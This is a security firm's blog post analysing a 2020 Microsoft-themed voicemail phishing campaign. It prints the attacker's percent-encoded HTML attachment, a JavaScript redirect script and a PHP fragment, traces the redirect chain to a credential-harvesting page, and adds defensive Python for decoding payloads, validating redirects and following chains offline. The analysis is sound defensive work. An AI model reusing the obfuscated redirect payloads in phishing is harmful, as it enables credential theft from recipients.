
Social distancing times are social engineering times


12.Jun.2020
Martin Jartelius, CSO, Outpost24

Pretty much anyone working in IT security will tell you that 2020 has been the year of phishing, and social distancing has contributed in a variety of ways to its popularity with the hacking community. Pre-pandemic, it would have been extremely unlikely (in many organizations) to receive instructions to add a new payment recipient in a hurried email; now that is far more plausible. Before Covid-19 hit and changed everything, it was unlikely that an accounts team missed a payment or that an invoice went unnoticed, but it becomes increasingly feasible as we are forced to work remotely and cracks form between teams. The increased reliance on remote working, and the change in our normal day-to-day routines, have effectively lowered our security defenses.

At Outpost24 we do not specialize in defending against phishing; we specialize in identifying risks before they become incidents, be it via vulnerability management, web application security, cloud security or identifying rogue wireless devices. We also perform red team assessments for organizations ready to test their assumptions: those who believe their security defenses are in place and want them realistically challenged by experts.

As a business that performs in-depth, targeted security testing for our customers, our own employees are also at risk of phishing and are targets for malicious threat actors. So, with some interest, we follow one very targeted attack closely in this article to see who may be directing these attacks at our organization, and to give you guidance on what to look out for in a suspect phishing email.

Recently, we encountered an attacker who had taken efficient spear-phishing to an interesting and increased level of consistency and automation. We’ve also seen firsthand the speed at which this attacker learned from some initial mistakes to launch the attack which we identify in the examples in this blog.

Phishing investigation, May 2020

My colleague Johan Tullberg, a former information security specialist now heading up our Nordics region in the sales organization, reached out with yet another attempted phishing email, as it was somewhat above and beyond what we see every day. We all appreciate decent craftsmanship when we see it, and this was decent.

We have seen this before, or at least variants of it, but never felt sufficiently interested to investigate in depth and see what kind of rabbit hole these messages lead to. Given the recent increase in attack frequency, we decided to find out exactly what we are looking at.

[Image 1: the phishing email]

Attached to the email is a file with a few phone symbols and Johan's name in its filename. It is an HTML resource, i.e. "a web page", and as such can be opened with any browser. It is a 784-character string, so nothing massive: most likely a link, a redirection, a small script or similar. After downloading the attachment and opening it in an editor, we get the following (email address redacted because, well, phishing).

<script language="javascript"> document.write(unescape('%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%72%65%66%72%65%73%68%22%20%63%6f%6e%74%65%6e%74%3d%22%31%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%6f%72%6c%64%6f%70%74%69%63%70%65%74%2e%63%6f%6d%2f%4a%6f%68%61%6e%2f%72%65%64%61%63%74%65%64%40%65%78%61%6d%70%6c%65%26%23%34%36%3b%63%6f%6d%22%3e')); </script>

After decoding the obfuscated content, we end up with something more readable (brackets added to avoid preloads and accidental clicks):

<meta http-equiv="refresh" content="1;url=hxxps://world[o]pticpet.com/[name]/[name]@[company]">

This instructs the browser, instead of staying on the local HTML file, to load the indicated page on the world[o]p[t]icpet.com website after one second. One small detail worth noting: in the encoded payload, the dot in the victim's email domain is written as the HTML entity &#46; (the %26%23%34%36%3b sequence), so the address is obfuscated twice, once by percent-encoding and once by an entity, yet the browser reconstructs it as soon as document.write() inserts the tag.
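To make the decoding step reproducible, here is an added example (not part of the original post and not the attacker's code) that takes an attachment like the one above, extracts the unescape() payload, decodes it the way a browser would (percent-escapes first, then the HTML entity inside the resulting tag) and pulls out the meta-refresh delay and target, reporting the target in defanged form. The sample input is the encoded string shown above, joined back onto one line; the function names are this example's own.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample input: the attachment body shown above, with the wrapped
# escape string joined back together.
SAMPLE_ATTACHMENT = (
    '<script language="javascript"> document.write(unescape(\''
    '%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%72%65%66%72%65%73%68%22%20'
    '%63%6f%6e%74%65%6e%74%3d%22%31%3b%75%72%6c%3d%68%74%74%70%73%3a%2f%2f%77%6f%72%6c'
    '%64%6f%70%74%69%63%70%65%74%2e%63%6f%6d%2f%4a%6f%68%61%6e%2f%72%65%64%61%63%74%65'
    '%64%40%65%78%61%6d%70%6c%65%26%23%34%36%3b%63%6f%6d%22%3e'
    '\')); </script>'
)

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']*)["\']',
    re.I,
)


def js_unescape(s: str) -> str:
    """Mimic JavaScript's legacy unescape(): %XX and %uXXXX, decoded in a single pass."""
    return re.sub(
        r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )


def decode_attachment(raw_html: str) -> str:
    """Return the markup that document.write(unescape(...)) would inject into the page."""
    m = UNESCAPE_CALL.search(raw_html)
    if not m:
        raise ValueError("no unescape() payload found")
    return js_unescape(m.group(2))


def refresh_target(markup: str):
    """Return (delay_seconds, url) from a <meta http-equiv="refresh"> tag, or None.

    Entities such as &#46; are decoded here because the HTML parser does that
    before the browser ever sees the URL."""
    m = META_REFRESH.search(markup)
    if not m:
        return None
    content = html.unescape(m.group(1))
    delay, _, url = content.partition(";")
    url = url.strip()
    if url.lower().startswith("url="):
        url = url[4:].strip().strip("'\"")
    return int(delay.strip() or 0), url


def defang(url: str) -> str:
    """Render a URL as hxxps://host[.]tld/... so it cannot be clicked from a report."""
    parts = urlsplit(url)
    scheme = parts.scheme.replace("http", "hxxp")
    host = parts.netloc.replace(".", "[.]")
    rest = parts.path + ("?" + parts.query if parts.query else "")
    return f"{scheme}://{host}{rest}"


def analyse(raw_html: str) -> dict:
    """One-shot analysis: decoded markup, redirect delay and defanged target."""
    markup = decode_attachment(raw_html)
    target = refresh_target(markup)
    return {
        "markup": markup,
        "delay": target[0] if target else None,
        "target": defang(target[1]) if target else None,
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

The script only parses; it never requests the target, which matters because the path carries the victim's address and a single fetch tells the attacker the mail was opened.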

First, we find out what server this is and where it is located:

$ nslookup w[o]rldopticpet.com

Name: w[o]rldopticpet.com
Address: 194.67.90.118
primary name server = dns1.p02.nsone.net
responsible mail addr = hostmaster.nsone.net

RIPE lookup of the IP address:

inetnum:  194.67.84.0 - 194.67.94.255
netname:  RU-REGRU-940712
country:  RU

Right, a Russian web host has an Office 365 voicemail message for us? Oh well.

So, the next step is to request the resource we are being directed to. Note that "Johan" and his email address are most likely parameters the phishers use to find out who clicked, and there is no reason to let those be logged, so they have been replaced in our requests:

GET /Analyst/redacted@example.com HTTP/1.0
Host: w[o]rldopticpet.com

Following our request, we received the following response from the web server:

HTTP/1.1 200 OK
Date: Wed, 20 May 2020 06:53:16 GMT
Server: Apache
refresh: 0;url=hxxps://[o]bjectstorage.us-ashburn-1.oraclecloud.com/n/idcpv4rkpzql/b/yangmlcrosoft-20200519-1946/o/oauthcommonsent.html#redacted@example.com
Connection: close
Content-Type: text/html; charset=UTF-8

Yet another redirect, this time through a Refresh response header rather than a 3xx status code. Browsers honour it; curl -L and most HTTP libraries only follow Location headers, so we follow this one by hand:

GET /n/idcpv4rkpzql/b/yangmlcrosoft-20200519-1946/o/oauthcommonsent.html HTTP/1.0
Host: [o]bjectstorage.us-ashburn-1.oraclecloud.com

Which presents us with their final goal: a fake Microsoft login page built to collect credentials from victims who fall for this decent-quality phishing page.

[Image 2: the fake Microsoft login page]

In the URL we noticed an interesting part of the resource path, the object storage bucket name:

yangmlcrosoft-20200519-1946

So this site was likely spun up on 2020-05-19 at 19:46, which is a fair guess given the other timestamps noted in this review. The bucket name also contains "mlcrosoft", a lookalike of "microsoft" for anyone who only glances at the URL. Some automation, CI/CD-style phishing deployments and scalable cloud storage: cool. Lazy phisherman... So, under the hood, a few hundred lines into the fake login page, we find the functionality of interest.

[Image 3: the credential-submission script in the fake login page]

What this means: if you attempt to log in, the page sends your credentials to another system and finally redirects you to an archived audio recording. Now, being curious cats, we of course wonder:

“What would a Russian hacker attempting to steal Johan’s credentials want Johan to listen to?”

So we derail for a moment to look closer at this voicemail, because why not? We are doing this review for our own curiosity and amusement, after all.

The link: hxxps://ia802906.us.archive.org/29/items/voicemail_201810/message.wav

Redirects to: hxxps://archive.org/download/voicemail_201810/message.wav

Which in turn, redirects to: hxxps://ia802807.us.archive.org/33/items/voicemail_201810/message.wav

Funnily enough, this is a genuinely archived voicemail of a telemarketer talking about office supplies and printer services. Cute. Mark Leone from Companyname Office Supplies. I mean, this is QUALITY: we have the right to get defrauded with style, and here we even GET OUR VOICEMAIL. Cute, funny, creepy, all in one package. Awesome.

"Mark Leone from Companyname office supply and printing. I was just trying to get in touch with you one last time in regards to your office supply needs.

I've left several messages for you. I'd love to help you out with anything you might need, whether it be office supplies, janitorial or something printed, so when you get a chance please give me a call."

Transcription courtesy of https://speech-to-text-demo.ng.bluemix.net/ (exact wording may be slightly off).

Oh, right, so back to the credentials harvesting.

If we look up the IP address of the lulubellestudio-home domain, to which the credentials are submitted, we see a familiar IP address:

Name: [l]ulubellestudio-home.com
Address: 194.67.90.118
primary name server = dns1.p05.nsone.net
responsible mail addr = hostmaster.nsone.net

This is the same server/IP address as where we started, now under a different domain name. So the attacker is using one server for both stages. A bit lazy and cheap of them.

Going to the server root first, hxxps://[l][u][l]ubellestudio-home.com/, we find the server configured with directory listings enabled, and we can see that the only file on it is the one receiving the harvested credentials:

Index of /
cgi-bin/ 2020-05-19 17:49
next1.php 2020-05-19 19:10

Now, one might wonder why this is of any interest. Well, the cgi-bin folder was created at 17:49 in the server's LOCAL TIME, and the phishing page was spun up at 19:46 (reading the bucket name as GMT), meaning the attacker completed the initial deployment, certificate setup included, in about 3 minutes. That is rather impressive for your average phishing attacker: significant time has been spent on not wasting time when deploying new campaigns. One caveat: the arithmetic only holds if the two clocks differ by two hours, for example the web server running on UTC and the bucket name stamped in the attacker's own UTC+2 zone (which would fit the Kaliningrad hosting), so treat the 3-minute figure as indicative rather than exact. The bucket name is also a string the attacker chose, not a timestamp recorded by the cloud provider.

Looking at the information-gathering PHP file, it wants some specific fields, and I am not in the mood to draw further attention, so I leave it alone after a first poke:

{"signal":"bad","msg":"Please fill in all the fields."}

Looking closer, the certificate was issued on the 19th, right before the "spamming" started:

Subject: CN=[l][u][l]ubellestudio-home.com
Issuer: C=US, O=cPanel, Inc., L=Houston, ST=TX, CN=cPanel, Inc. Certification Authority
Validity: 19 May 2020 to 17 Aug 2020

With the alternative DNS names (the default set of service subdomains that cPanel's AutoSSL includes for a hosting account):

[l]ulubellestudio-home.com
[c]panel.lulubellestudio-home.com
[c]pcalendars.lulubellestudio-home.com
[c]pcontacts.lulubellestudio-home.com
[m]ail.lulubellestudio-home.com
[w]ebdisk.lulubellestudio-home.com
[w]ebmail.lulubellestudio-home.com
[w]ww.lulubellestudio-home.com

And a second certificate, issued by Let's Encrypt with the same 90-day validity window:

Subject: CN=www.[l]ulubellestudio-home.com
Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
Validity: 19 May 2020 to 17 Aug 2020

So, long story short: had Johan opted to "listen to his voicemail", a Russian attacker, hosting their files in the Kaliningrad region (or at least that is where the web host is located), would potentially have had access to Salesforce and other systems, and definitely to Johan's email and every file on SharePoint and Yammer that Johan has access to. Hence the importance of strong, unique passwords and multi-factor authentication wherever possible, to limit the impact even when an attacker obtains your credentials. And when you receive an unsolicited email, think twice before you click!

This example shows the lengths a hacker will go to in order to gain access to your vital information. Thanks to Johan's quick thinking, we were able to dig deeper and see for ourselves the techniques and processes a hacker goes through in an attempt to fool the recipient. Well, nice try!

Annex – Evolution of the attack

Now, this post could have ended here. It was initially written as content for internal awareness training, but things happened that made it more interesting to share with our wider audience.

Firstly, we received more instances of this attack, and we have started receiving other versions of phishing emails, including "your mailbox is almost full" variants, proving that attackers will go to extraordinary lengths and are not put off by a global pandemic; they use it to their advantage.

Note that the chain below has substantial differences from, but also some similarities to, the example above. Most notably, the chain does not start on the attacker's own systems, and it ends in US-hosted cloud environments, which in itself indicates substantial differences. But the exact same email is used in the initial attack, the same email-verification behaviour has been observed, and the same final redirect and the same server and PHP versions are used on the disposable parts of the infrastructure.

[Image 4: the second phishing email]

Note the green box at the top, which is an image included in the attacker's email and not part of the Outlook interface.

At this point, however, the attacker is no longer as open: if an email address that did not receive the spam is submitted, the chain never reaches the phishing page and instead redirects to Google. This started happening in the fake voicemail example above too, and the later campaigns use very similar infrastructure as far as the code goes, but consistently different sender domains (where SPF records are missing) and different initial redirection domains. Some rely on existing websites with an open redirect vulnerability, so that a legitimate-looking link in the email fronts the traffic and forwards it to recently registered domains hosting the actual phishing.
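The open-redirect hop is worth showing in code. The following is an added example, not code from any site mentioned in this post and not the attacker's: a minimal redirect handler in its vulnerable form beside a hardened one that only sends the browser to a same-site path or to an allow-listed host, and that rejects the usual bypasses (protocol-relative //host, embedded credentials user@host, backslashes, javascript: URLs, scheme-without-slashes). The allow-listed host www.example.com and the function names are this example's own; the sample query string mirrors the one in the chain below.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: hosts this site is willing to redirect to.
ALLOWED_HOSTS = {"www.example.com"}

# Constructed sample input: the query string from the chain below,
# as the redirector would receive it (the ?email part is not encoded,
# so it rides along inside the url parameter).
SAMPLE_QUERY = (
    "url=https%3A%2F%2Fhrcbhehfhc-rfhhwhrhfhchaheq-1.web.app"
    "?email=analyst@example.com"
)


def vulnerable_rd(query_string: str) -> str:
    """What an open redirector does: trust the url parameter as-is."""
    params = parse_qs(query_string)
    return params.get("url", ["/"])[0]


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Allow only a same-site absolute path or an http(s) URL to an allow-listed host."""
    # Browsers treat backslashes like slashes, and control characters are
    # never legitimate in a redirect target, so refuse both outright.
    if "\\" in target or any(ord(c) < 0x20 for c in target):
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # A relative path. "//evil.example" parses with a netloc, so it never
        # reaches this branch; "///evil.example" parses with an empty netloc
        # but some browsers collapse it to a protocol-relative URL, so it is
        # rejected by the "//" check.
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme.lower() not in ("http", "https"):
        return False          # javascript:, data:, and "https:evil.example"
    if parts.username is not None or parts.password is not None:
        return False          # https://www.example.com@evil.example/
    return (parts.hostname or "").lower() in allowed_hosts


def hardened_rd(query_string: str, allowed_hosts=ALLOWED_HOSTS, fallback: str = "/") -> str:
    """Validate the url parameter and fall back to the home page when it fails."""
    target = vulnerable_rd(query_string)
    return target if is_safe_redirect(target, allowed_hosts) else fallback


if __name__ == "__main__":
    print("vulnerable ->", vulnerable_rd(SAMPLE_QUERY))
    print("hardened   ->", hardened_rd(SAMPLE_QUERY))
```

The hardened version deliberately compares the parsed hostname, not a prefix of the raw string: "https://www.example.com.evil.example/" and "https://www.example.com@evil.example/" both start with the trusted name and both fail here.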

In one of the examples, the attacker for some reason put PHP code in an HTML document.

Following such a chain, starting with an open redirect on a likely innocent website:

GET /rd.htm?url=http[s]%3A%2F%2Fhrcbhehfhc-rfhhwhrhfhchaheq-1.web.app?email=analyst@example.com HTTP/1.1
Host: [b]bp.salesmanago.pl

This redirects to

GET /?email=analyst@example.com HTTP/1.1
Host: [h]rcbhehfhc-rfhhwhrhfhchaheq-1.web.app

The response from the web.app host (Google's Firebase Hosting, which serves static files and does not execute PHP) includes this section, which in a .php file would have run on the server and is most likely designed to block investigation (via the included blocker.php) while picking up the email parameter:

<?php
include('blocker.php');
$email = $_GET['email'];
?>

We then have a JavaScript-based redirection to the next step in the chain. Remember this script, including its two comments; we come back to them later.

<script type="text/javascript">
function getUrlVars() {
    var vars = {};
    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
        vars[key] = value;
    });
    return vars;
}
var email = getUrlVars()['email'];
var redirect = "http[s]://change.jchfhtbsbnf-owabusiness-voiceaapp.club/"; // replace your link here
var urlFinal = redirect + "?e=" + email;
setTimeout(function () {
    window.location.href = urlFinal; //will redirect to your blog page (an ex: blog.html)
}, 2000);
</script>

Following this, we have the next few, rather disappointing, steps:

Request:

GET /?e=analyst@example.com HTTP/1.1
Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 302 Found
Location: main

Request:

GET /main HTTP/1.1
Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 301 Moved Permanently
Location: https://[c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club/main/

Request:

GET /main/ HTTP/1.1
Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 302 Found
Location: https://www.google.com

So the last page, at [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club/main/, is where the redirection over to Google happens, ending the series of redirections in a rather disappointing way.
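Both chains in this post were walked by hand, one request at a time. The following added example (not the original post's tooling and not the attacker's code) automates the HTTP-level part of that walk: it resolves relative Location headers such as "main", honours the non-standard Refresh response header that the May chain used and that curl -L and most HTTP libraries ignore, stops on loops and errors, and hands page bodies back for manual inspection rather than executing their scripts. It never touches the network: the transport is a constructed table that replays the responses recorded in this post (the Refresh hop from the May investigation and the 302/301/302 sequence above). The victim token is swapped out before the first request, as was done in the manual walkthrough; the Hop type and function names are this example's own.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urldefrag, urljoin

# (status, headers with lowercase names, body)
Response = Tuple[int, Dict[str, str], str]
Fetcher = Callable[[str], Response]

CLUB = "https://change.jchfhtbsbnf-owabusiness-voiceaapp.club"
BUCKET = ("https://objectstorage.us-ashburn-1.oraclecloud.com/n/idcpv4rkpzql/b/"
          "yangmlcrosoft-20200519-1946/o/oauthcommonsent.html")

# Constructed offline transport replaying the responses recorded in this post.
RECORDED: Dict[str, Response] = {
    "https://worldopticpet.com/Analyst/redacted@example.com":
        (200, {"refresh": "0;url=" + BUCKET + "#redacted@example.com",
               "content-type": "text/html; charset=UTF-8"}, ""),
    BUCKET: (200, {"content-type": "text/html"}, "<html>fake login page, body omitted</html>"),
    CLUB + "/?e=analyst@example.com": (302, {"location": "main"}, ""),
    CLUB + "/main": (301, {"location": CLUB + "/main/"}, ""),
    CLUB + "/main/": (302, {"location": "https://www.google.com"}, ""),
    "https://www.google.com": (200, {"content-type": "text/html"}, "<html>search</html>"),
}


def replay_fetch(url: str) -> Response:
    """Stand-in for a real HTTP client; the fragment never goes on the wire."""
    key, _ = urldefrag(url)
    return RECORDED.get(key, (404, {}, ""))


@dataclass
class Hop:
    url: str
    status: int
    via: str                      # "location", "refresh-header", "body", "loop" or "error"
    next_url: Optional[str] = None


def redirect_from_headers(url: str, status: int, headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (absolute next URL, mechanism) for a header-level redirect, else None."""
    if 300 <= status < 400 and headers.get("location"):
        return urljoin(url, headers["location"]), "location"
    refresh = headers.get("refresh")
    if refresh:                   # "0;url=https://..." as sent by the first chain
        _, _, target = refresh.partition(";")
        target = target.strip()
        if target.lower().startswith("url="):
            target = target[4:].strip()
        if target:
            return urljoin(url, target), "refresh-header"
    return None


def swap_victim(url: str, victim: str, stand_in: str = "analyst@example.com") -> str:
    """Replace the tracking token so the attacker never learns who opened the mail."""
    return url.replace(victim, stand_in)


def follow(start: str, fetch: Fetcher = replay_fetch, max_hops: int = 10) -> List[Hop]:
    """Walk header-level redirects; stop where a body needs a human (or a sandbox)."""
    hops: List[Hop] = []
    seen = set()
    url = start
    while len(hops) < max_hops:
        if url in seen:
            hops.append(Hop(url, 0, "loop"))
            break
        seen.add(url)
        status, headers, body = fetch(url)
        if status >= 400:
            hops.append(Hop(url, status, "error"))
            break
        nxt = redirect_from_headers(url, status, headers)
        if nxt is None:
            hops.append(Hop(url, status, "body"))   # e.g. the fake login page, or Google
            break
        hops.append(Hop(url, status, nxt[1], nxt[0]))
        url = nxt[0]
    return hops


if __name__ == "__main__":
    # The attachment pointed at /Johan/<address>; the walkthrough requested /Analyst/<redacted>.
    may_chain = swap_victim("https://worldopticpet.com/Johan/redacted@example.com",
                            "Johan/redacted@example.com", "Analyst/redacted@example.com")
    for start in (may_chain, CLUB + "/?e=analyst@example.com"):
        for hop in follow(start):
            print(f"{hop.status:>3} {hop.via:<15} {hop.url.replace('http', 'hxxp', 1)}")
        print()
```

Swapping replay_fetch for a real client is a one-line change, but keep the request shape the walkthrough used (HTTP/1.0, no cookies, no JavaScript) and send it from an address you do not mind the attacker logging; the chain's whole purpose is to confirm that a live mailbox clicked.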

As the most interesting part here was the rather carelessly served page with PHP content that also included a script, we can note that parts of the script are used as examples on, for example, Stack Exchange; but if we search for the two rather unique comments in the script, we narrow it down to two places where this is indexed by Google.

One relates to sandbox analysis of suspected spam, showing in its details how the same content has been investigated by a US media company after they received the material, and how it has been investigated by another security-checking service. The latter also shows other investigated phishing attacks where the same infrastructure was used.

Looking closely at this, we find the following, which has been used in other, earlier, unrelated attacks. This last part is not clearly linked to the current campaign, and the current campaign is only loosely linked by the fact that they all started using the same prevention mechanisms after our initial review in May. It may be several groups or individuals using similar automated tooling, or the same perpetrator running a range of campaigns in parallel. The later attempts have shown lower sophistication than the initially investigated campaign, though.

[Image 5]

Final words: Remain resilient and report anything that doesn’t look right

The final, final words: as can be seen here, not only are these phishing emails of good quality, with the infrastructure constantly changing, but the methods of delivery are adapting too. What is more, if the initial attack and the second identical email, which used the later-observed infrastructure, show the attackers to be the same or related, then they learned from our initial investigative actions, even though those were non-intrusive, and changed their way of working to make our future analysis harder.

Be careful out there, and if you get a strange email, call the sender, or whoever you would expect to be responsible, on a number you have confirmed somewhere other than in the email.
